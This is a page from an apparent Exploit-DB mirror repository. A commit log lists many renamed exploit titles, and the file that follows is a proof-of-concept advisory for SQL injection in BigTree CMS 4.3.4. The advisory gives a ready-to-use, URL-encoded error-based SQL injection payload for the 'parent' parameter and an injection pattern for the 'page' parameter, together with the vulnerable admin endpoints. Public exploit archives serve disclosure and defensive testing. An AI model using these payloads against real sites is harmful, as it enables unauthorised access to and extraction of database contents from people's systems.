bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/46623.txt
Offensive Security e4e3f1c741 DB: 2019-03-29 
15 changes to exploits/shellcodes

Microsoft Visio 2016 16.0.4738.1000 - 'Log in accounts' Denial of Service
gnutls 3.6.6 - 'verify_crt()' Use-After-Free

Microsoft Windows Task Scheduler (Windows XP/2000) - '.job' (MS04-022)
Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence (1)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence (2)

NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses
NXP Semiconductors MIFARE Classic Smartcard - Multiple Vulnerabilities

Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalations
Accellion Secure File Transfer Appliance - Multiple Command Restriction / Privilege Escalations

EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses
EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation
PonyOS 3.0 - VFS Permissions
PonyOS 3.0 - ELF Loader Privilege Escalation
PonyOS 3.0 - TTY 'ioctl()' Kernel Local Privilege Escalation
Linux Kernel (PonyOS 3.0) - VFS Permissions Local Privilege Escalation
Linux Kernel (PonyOS 3.0) - ELF Loader Local Privilege Escalation
Linux Kernel (PonyOS 3.0) - TTY 'ioctl()' Local Privilege Escalation

PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation
Linux Kernel (PonyOS 4.0) - 'fluttershy' LD_LIBRARY_PATH Local Privilege Escalation
Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)
Microsoft Windows Manager (7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS17-017)
Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS16-039)

Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution
Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution

Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH Egghunter)

Linux Kernel 2.2 - TCP/IP Weakness Spoof IP
Linux Kernel 2.2 - TCP/IP Spoof IP

Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)
Microsoft Windows Media Encoder (XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (1)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (2)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (1)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (2)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (1)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (2)
PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)
PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)
PHP 5.2.6 - 'create_function()' Code Injection (2)
PHP 5.2.6 - 'create_function()' Code Injection (1)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (1)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2)
WebKit - Insufficient Entropy Random Number Generator Weakness (1)
WebKit - Insufficient Entropy Random Number Generator Weakness (2)
WebKit - Insufficient Entropy Random Number Generator (1)
WebKit - Insufficient Entropy Random Number Generator (2)

SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking
SonicWALL - 'SessId' Cookie Brute Force / Admin Session Hijacking

Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)

Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)
elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)

Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)
Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming Remote Code Execution (Metasploit)
CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)
Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure (1)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure (2)

LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting
LemonLDAP:NG 0.9.3.1 - User Enumeration / Cross-Site Scripting

Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities
Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities

MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure
MotoCMS - 'admin/data/users.xml' Access Restriction / Information Disclosure

Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses
Coppermine Gallery < 1.5.44 - Directory Traversal

Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change
Tenda W308R v2 Wireless Router 5.07.48 - (Cookie Session) Remote DNS Change

Cobub Razor 0.8.0 - Physical path Leakage
Cobub Razor 0.8.0 - Physical Path Leakage
Thomson Reuters Concourse & Firm Central < 2.13.0097 - Directory Traversal / Local File Inclusion
Airbnb Clone Script - Multiple SQL Injection
Fat Free CRM 0.19.0 - HTML Injection
WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion
WordPress Plugin Loco Translate 2.2.1 - Local File Inclusion
i-doit 1.12 - 'qr.php' Cross-Site Scripting
Job Portal 3.1 - 'job_submit' SQL Injection
BigTree 4.3.4 CMS - Multiple SQL Injection
Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection
2019-03-29 05:01:59 +00:00

51 lines
No EOL
2.5 KiB
Text
Raw Blame History

===========================================================================================
# Exploit Title: BigTree CMS - 'parent' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : parent
# Attack Pattern :
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
# POST Method :
http://localhost/BigTree-CMS/site/index.php/admin/pages/create/
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: BigTree CMS - 'page' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : page
# Attack Pattern : %2527
# GET Method :
http://localhost/BigTree-CMS/site/index.php/admin/ajax/tags/get-page/?page=[SQL
Inject Here]&sort=
===========================================================================================
Reference in a new issue View git blame Copy permalink